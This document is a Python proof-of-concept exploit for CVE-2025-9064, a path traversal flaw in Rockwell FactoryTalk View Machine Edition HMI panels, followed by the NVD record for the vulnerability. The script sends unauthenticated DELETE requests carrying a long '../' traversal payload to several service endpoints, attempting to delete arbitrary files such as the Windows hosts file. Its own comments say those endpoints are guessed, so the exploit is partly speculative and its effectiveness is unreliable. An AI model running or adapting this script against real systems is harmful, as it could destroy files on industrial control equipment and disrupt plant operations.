CVE-2025-9064

# CVE-2025-9064 - FactoryTalk View Machine Edition Path Traversal PoC # Vulnerability: Unauthenticated arbitrary file deletion via path traversal # Affected Product: Rockwell Automation FactoryTalk View Machine Edition import requests import sys TARGET_HOST = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.100" TARGET_PORT = sys.argv[2] if len(sys.argv) > 2 else 80 TARGET_FILE = sys.argv[3] if len(sys.argv) > 3 else "Windows/System32/drivers/etc/hosts" # Construct the base URL for the FactoryTalk View ME service base_url = f"http://{TARGET_HOST}:{TARGET_PORT}" # Path traversal payload to delete arbitrary files # The vulnerability allows traversing out of the intended directory traversal_payload = "../../../../../../../../../../" + TARGET_FILE def exploit_delete_file(target_url, file_path): """ Exploit path traversal to delete a file on the target system. The endpoint is guessed based on typical FTView ME service patterns. """ # Attempt 1: Common file deletion endpoint with traversal endpoints = [ "/FTView/file/delete", "/me/file/delete", "/runtime/file/delete", "/panelview/file/delete", ] for endpoint in endpoints: url = target_url + endpoint params = {"path": file_path} try: response = requests.delete(url, params=params, timeout=10) if response.status_code in [200, 204]: print(f"[+] Successfully sent delete request to {url}") print(f"[+] Target file: {file_path}") return True except requests.exceptions.RequestException as e: print(f"[-] Error connecting to {url}: {e}") continue return False if __name__ == "__main__": print(f"[*] Targeting: {base_url}") print(f"[*] Target file: {TARGET_FILE}") print(f"[*] Traversal payload: {traversal_payload}") if exploit_delete_file(base_url, traversal_payload): print("[+] Exploit completed.") else: print("[-] Exploit failed. Target may not be vulnerable or endpoint differs.")

{"cve": {"id": "CVE-2025-9064", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:39.643", "lastModified": "2025-10-28T15:20:33.767", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A path traversal security issue exists within FactoryTalk View Machine Edition, allowing unauthenticated attackers on the same network as the device to delete any file within the panels operating system. Exploitation of this vulnerability is dependent on the knowledge of filenames to be deleted."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rockwellautomation:factorytalk_view:*:*:*:*:machine:*:*:*", "versionEndIncluding": "15.0", "matchCriteriaId": "657BF325-6E3D-4E4F-971E-65B2300D3B13"}]}]}], "references": [{"url": "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1753.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}